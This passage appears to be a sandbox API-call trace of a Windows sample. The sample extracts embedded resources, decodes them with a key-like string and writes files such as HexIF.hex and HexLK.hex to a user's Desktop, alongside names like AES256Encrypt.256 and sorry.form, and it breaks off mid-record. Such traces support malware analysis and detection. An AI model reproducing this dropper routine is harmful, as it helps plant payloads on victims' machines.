(dwErrCode=0x0) [0076.225] wcsncpy (in: _Dest=0x2a60608, _Source="792925*HexDCIF.hex:32:*55867*", _Count=0x6 | out: _Dest="792925rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\n") returned="792925rs\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\n" [0076.225] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x16) returned 0x2a68af8 [0076.225] wcsstr (_Str="792925", _SubStr=":") returned 0x0 [0076.225] GetLastError () returned 0x0 [0076.225] SetLastError (dwErrCode=0x0) [0076.225] GetLastError () returned 0x0 [0076.225] SetLastError (dwErrCode=0x0) [0076.225] wcsncpy (in: _Dest=0x2a60608, _Source="HexDCIF.hex:32:*55867*", _Count=0xf | out: _Dest="HexDCIF.hex:32:\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\n") returned="HexDCIF.hex:32:\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\n" [0076.225] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x28) returned 0x2a68af8 [0076.225] wcsstr (_Str="HexDCIF.hex:32:", _SubStr=":") returned=":32:" [0076.225] GetLastError () returned 0x0 [0076.226] SetLastError (dwErrCode=0x0) [0076.226] GetLastError () returned 0x0 [0076.226] SetLastError (dwErrCode=0x0) [0076.226] wcsncpy (in: _Dest=0x2a60608, _Source="32:", _Count=0x2 | out: _Dest="32xDCIF.hex:32:") returned="32xDCIF.hex:32:" [0076.226] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67828, Size=0xe) returned 0x2a67858 [0076.226] GetLastError () returned 0x0 [0076.226] SetLastError (dwErrCode=0x0) [0076.226] GetLastError () returned 0x0 [0076.226] SetLastError (dwErrCode=0x0) [0076.226] wcsncpy (in: _Dest=0x2a60608, _Source="HexDCIF.hex:32:", _Count=0xb | out: _Dest="HexDCIF.hex:32:") returned="HexDCIF.hex:32:" [0076.226] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x20) returned 0x2a68af8 [0076.226] GetLastError () returned 0x0 [0076.226] SetLastError (dwErrCode=0x0) [0076.226] GetLastError () returned 0x0 [0076.226] SetLastError (dwErrCode=0x0) [0076.226] GetLastError () returned 0x0 [0076.227] SetLastError (dwErrCode=0x0) [0076.227] GetLastError () returned 0x0 [0076.227] SetLastError (dwErrCode=0x0) [0076.227] wcsncmp (_String1="H", _String2="?", _MaxCount=0x1) returned 9 [0076.227] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.227] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.227] wcsncmp (_String1="D", _String2="?", _MaxCount=0x1) returned 5 [0076.227] wcsncmp (_String1="C", _String2="?", _MaxCount=0x1) returned 4 [0076.227] wcsncmp (_String1="I", _String2="?", _MaxCount=0x1) returned 10 [0076.227] wcsncmp (_String1="F", _String2="?", _MaxCount=0x1) returned 7 [0076.227] wcsncmp (_String1=".", _String2="?", _MaxCount=0x1) returned -17 [0076.227] wcsncmp (_String1="h", _String2="?", _MaxCount=0x1) returned 41 [0076.227] wcsncmp (_String1="e", _String2="?", _MaxCount=0x1) returned 38 [0076.227] wcsncmp (_String1="x", _String2="?", _MaxCount=0x1) returned 57 [0076.227] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x20) returned 0x2a68af8 [0076.227] GetLastError () returned 0x0 [0076.227] SetLastError (dwErrCode=0x0) [0076.227] wcslen (_String="HexDCIF.hex") returned 0xb [0076.227] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a69de8 [0076.227] GetLastError () returned 0x0 [0076.227] SetLastError (dwErrCode=0x0) [0076.228] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\n") returned 0x144 [0076.228] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.228] wcslen (_String="\\") returned 0x1 [0076.228] wcslen (_String="HexDCIF.hex") returned 0xb [0076.228] wcslen (_String="\r\n") returned 0x2 [0076.228] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6ad98, Size=0x2dc) returned 0x2a6ad98 [0076.228] GetLastError () returned 0x0 [0076.228] SetLastError (dwErrCode=0x0) [0076.228] GetLastError () returned 0x0 [0076.228] SetLastError (dwErrCode=0x0) [0076.228] wcsncpy (in: _Dest=0x2a60608, _Source="55867*", _Count=0x5 | out: _Dest="55867ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\nC:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex\r\n") returned="55867ers\\FD1HVy\\Desktop\\HexIF.hex\r\nC:\\Users\\FD1HVy\\Desktop\\HexLK.hex\r\nC:\\Users\\FD1HVy\\Desktop\\rd000db.dll\r\nC:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll\r\nC:\\Users\\FD1HVy\\Desktop\\AES256Encrypt.256\r\nC:\\Users\\FD1HVy\\Desktop\\PCRepair_rkill.dll\r\nC:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns\r\nC:\\Users\\FD1HVy\\Desktop\\sorry.form\r\nC:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex\r\n" [0076.228] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x14) returned 0x2a68af8 [0076.228] wcsstr (_Str="55867", _SubStr=":") returned 0x0 [0076.228] GetLastError () returned 0x0 [0076.228] SetLastError (dwErrCode=0x0) [0076.228] GetLastError () returned 0x0 [0076.228] SetLastError (dwErrCode=0x0) [0076.228] wcsncpy (in: _Dest=0x2a60608, _Source="", _Count=0x0 | out: _Dest="55867") returned="55867" [0076.229] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0xa) returned 0x2a68af8 [0076.229] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68af8 | out: hHeap=0x2a60000) returned 1 [0076.229] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a67858 | out: hHeap=0x2a60000) returned 1 [0076.229] GetLastError () returned 0x0 [0076.229] SetLastError (dwErrCode=0x0) [0076.229] GetLastError () returned 0x0 [0076.229] SetLastError (dwErrCode=0x0) [0076.229] GetLastError () returned 0x0 [0076.229] SetLastError (dwErrCode=0x0) [0076.229] GetLastError () returned 0x0 [0076.229] SetLastError (dwErrCode=0x0) [0076.229] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a910b0 [0076.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HexIF.hex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.229] malloc (_Size=0xb) returned 0x1121150 [0076.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HexIF.hex", cchWideChar=10, lpMultiByteStr=0x1121150, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HexIF.hex", lpUsedDefaultChar=0x0) returned 10 [0076.231] free (_Block=0x1121150) [0076.231] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0076.231] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a158 [0076.231] GetLastError () returned 0x0 [0076.231] SetLastError (dwErrCode=0x0) [0076.231] GetLastError () returned 0x0 [0076.231] SetLastError (dwErrCode=0x0) [0076.231] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a290 [0076.231] FindResourceW (hModule=0x400000, lpName="EFB649238D92C501591499BF55FAA9B00D7189C0", lpType=0xa) returned 0x0 [0076.231] FindResourceW (hModule=0x400000, lpName="0C9817D00B9AAF55FB994195105C29D832946BFE", lpType=0xa) returned 0x8591f8 [0076.231] LoadResource (hModule=0x400000, hResInfo=0x8591f8) returned 0x872964 [0076.231] SizeofResource (hModule=0x400000, hResInfo=0x8591f8) returned 0x1b7bc4 [0076.231] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x1b7bc4) returned 0x2bd9020 [0076.469] FreeResource (hResData=0x872964) returned 0 [0076.469] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x2bd9020) returned 0x1b7bc4 [0076.469] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0076.469] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a687f0 [0076.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0076.469] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e07c8 [0076.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e07c8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0076.469] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e07c8) returned 0x21 [0076.469] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a910b0 [0076.469] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a914d0 [0076.613] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0076.613] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910b0 [0076.613] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a914d0 | out: hHeap=0x2a90000) returned 1 [0076.613] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910d8 [0076.613] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0076.613] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a687f0 | out: hHeap=0x2a60000) returned 1 [0076.614] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0076.614] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910d8 | out: hHeap=0x2a90000) returned 1 [0076.614] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x1f0c00) returned 0x2dab020 [0076.620] GetLastError () returned 0x0 [0076.620] SetLastError (dwErrCode=0x0) [0076.620] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.620] wcslen (_String="\\") returned 0x1 [0076.620] wcslen (_String="HexIF.hex") returned 0x9 [0076.620] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68530 [0076.620] malloc (_Size=0x1bcc) returned 0x11224f0 [0076.734] free (_Block=0x11224f0) [0076.734] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.734] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68480 [0076.734] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.734] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68218 [0076.734] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a910b0 [0076.734] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.735] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0076.735] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a910b0 [0076.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0076.736] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a910e0 [0076.736] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0076.736] WriteFile (in: hFile=0x7c, lpBuffer=0x2a910e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a910e0*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0076.736] WriteFile (in: hFile=0x7c, lpBuffer=0x2dab020*, nNumberOfBytesToWrite=0x1f0c00, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x2dab020*, lpNumberOfBytesWritten=0x19fe60*=0x1f0c00, lpOverlapped=0x0) returned 1 [0076.837] WriteFile (in: hFile=0x7c, lpBuffer=0x2a910e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a910e0*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0076.837] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910e0 | out: hHeap=0x2a90000) returned 1 [0076.837] CloseHandle (hObject=0x7c) returned 1 [0076.920] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0076.920] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x2a60000) returned 1 [0076.920] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2dab020 | out: hHeap=0x10e0000) returned 1 [0076.933] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.933] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a684d8 [0076.934] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a910b0 [0076.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0076.934] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a910e0 [0076.934] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910e0 | out: hHeap=0x2a90000) returned 1 [0076.934] CloseHandle (hObject=0x7c) returned 1 [0076.934] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0076.934] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a684d8 | out: hHeap=0x2a60000) returned 1 [0076.934] GetLastError () returned 0x0 [0076.934] SetLastError (dwErrCode=0x0) [0076.934] GetLastError () returned 0x0 [0076.935] SetLastError (dwErrCode=0x0) [0076.935] GetLastError () returned 0x0 [0076.935] SetLastError (dwErrCode=0x0) [0076.935] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.935] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68168 [0076.935] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e07c8 [0076.935] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", lpszShortPath=0x10e07c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.935] GetLastError () returned 0x0 [0076.935] SetLastError (dwErrCode=0x0) [0076.935] GetLastError () returned 0x0 [0076.935] SetLastError (dwErrCode=0x0) [0076.935] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68690 [0076.935] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0076.935] GetLastError () returned 0x0 [0076.935] SetLastError (dwErrCode=0x0) [0076.935] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.935] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68168 | out: hHeap=0x2a60000) returned 1 [0076.936] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68690 | out: hHeap=0x2a60000) returned 1 [0076.936] GetLastError () returned 0x0 [0076.936] SetLastError (dwErrCode=0x0) [0076.936] wcslen (_String="b2eincfile") returned 0xa [0076.957] GetLastError () returned 0x0 [0076.957] SetLastError (dwErrCode=0x0) [0076.957] GetLastError () returned 0x0 [0076.957] SetLastError (dwErrCode=0x0) [0076.957] SetEnvironmentVariableW (lpName="b2eincfile1", lpValue="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 1 [0076.958] GetLastError () returned 0x0 [0076.958] SetLastError (dwErrCode=0x0) [0076.958] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x118) returned 0x2a910b0 [0076.958] GetLastError () returned 0x0 [0076.958] SetLastError (dwErrCode=0x0) [0076.958] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex") returned 0x21 [0076.958] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68270 [0076.958] GetLastError () returned 0x0 [0076.958] SetLastError (dwErrCode=0x0) [0076.958] GetLastError () returned 0x0 [0076.958] SetLastError (dwErrCode=0x0) [0076.958] GetLastError () returned 0x0 [0076.958] SetLastError (dwErrCode=0x0) [0076.958] GetLastError () returned 0x0 [0076.958] SetLastError (dwErrCode=0x0) [0076.959] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0076.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HexLK.hex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.959] malloc (_Size=0xb) returned 0x1121150 [0076.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HexLK.hex", cchWideChar=10, lpMultiByteStr=0x1121150, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HexLK.hex", lpUsedDefaultChar=0x0) returned 10 [0076.959] free (_Block=0x1121150) [0076.959] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0076.959] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a158, Size=0x5a) returned 0x2a6a568 [0076.959] GetLastError () returned 0x0 [0076.959] SetLastError (dwErrCode=0x0) [0076.959] GetLastError () returned 0x0 [0076.960] SetLastError (dwErrCode=0x0) [0076.960] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a290, Size=0x5a) returned 0x2a6a5d0 [0076.960] FindResourceW (hModule=0x400000, lpName="39496D8FAAF561A6D1FE940F68EFA23ADF5CF019", lpType=0xa) returned 0x0 [0076.960] FindResourceW (hModule=0x400000, lpName="910FC5FDA32AFE86F049EF1D6A165FAAF8D69493", lpType=0xa) returned 0x859310 [0076.960] LoadResource (hModule=0x400000, hResInfo=0x859310) returned 0xbd37ec [0076.960] SizeofResource (hModule=0x400000, hResInfo=0x859310) returned 0x630da [0076.960] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x630da) returned 0x28d0048 [0076.969] FreeResource (hResData=0xbd37ec) returned 0 [0076.969] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x28d0048) returned 0x630da [0076.969] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0076.969] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a684d8 [0076.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0076.969] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x2933130 [0076.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x2933130, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0076.969] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x2933130) returned 0x21 [0076.969] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0076.969] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0076.975] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0076.975] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0076.975] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0076.975] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0076.975] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2933130 | out: hHeap=0x10e0000) returned 1 [0076.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a684d8 | out: hHeap=0x2a60000) returned 1 [0076.975] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0076.975] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0076.975] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xc4066) returned 0x2daf020 [0076.978] GetLastError () returned 0x0 [0076.978] SetLastError (dwErrCode=0x0) [0076.978] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0076.978] wcslen (_String="\\") returned 0x1 [0076.978] wcslen (_String="HexLK.hex") returned 0x9 [0076.978] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68530, Size=0x4c) returned 0x2a687f0 [0076.978] malloc (_Size=0x1bcc) returned 0x11224f0 [0077.048] free (_Block=0x11224f0) [0077.048] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.048] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68110 [0077.048] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex") returned 0x21 [0077.048] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4c) returned 0x2a68740 [0077.048] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.048] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.048] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68740 | out: hHeap=0x2a60000) returned 1 [0077.048] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.049] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.049] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0077.049] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: 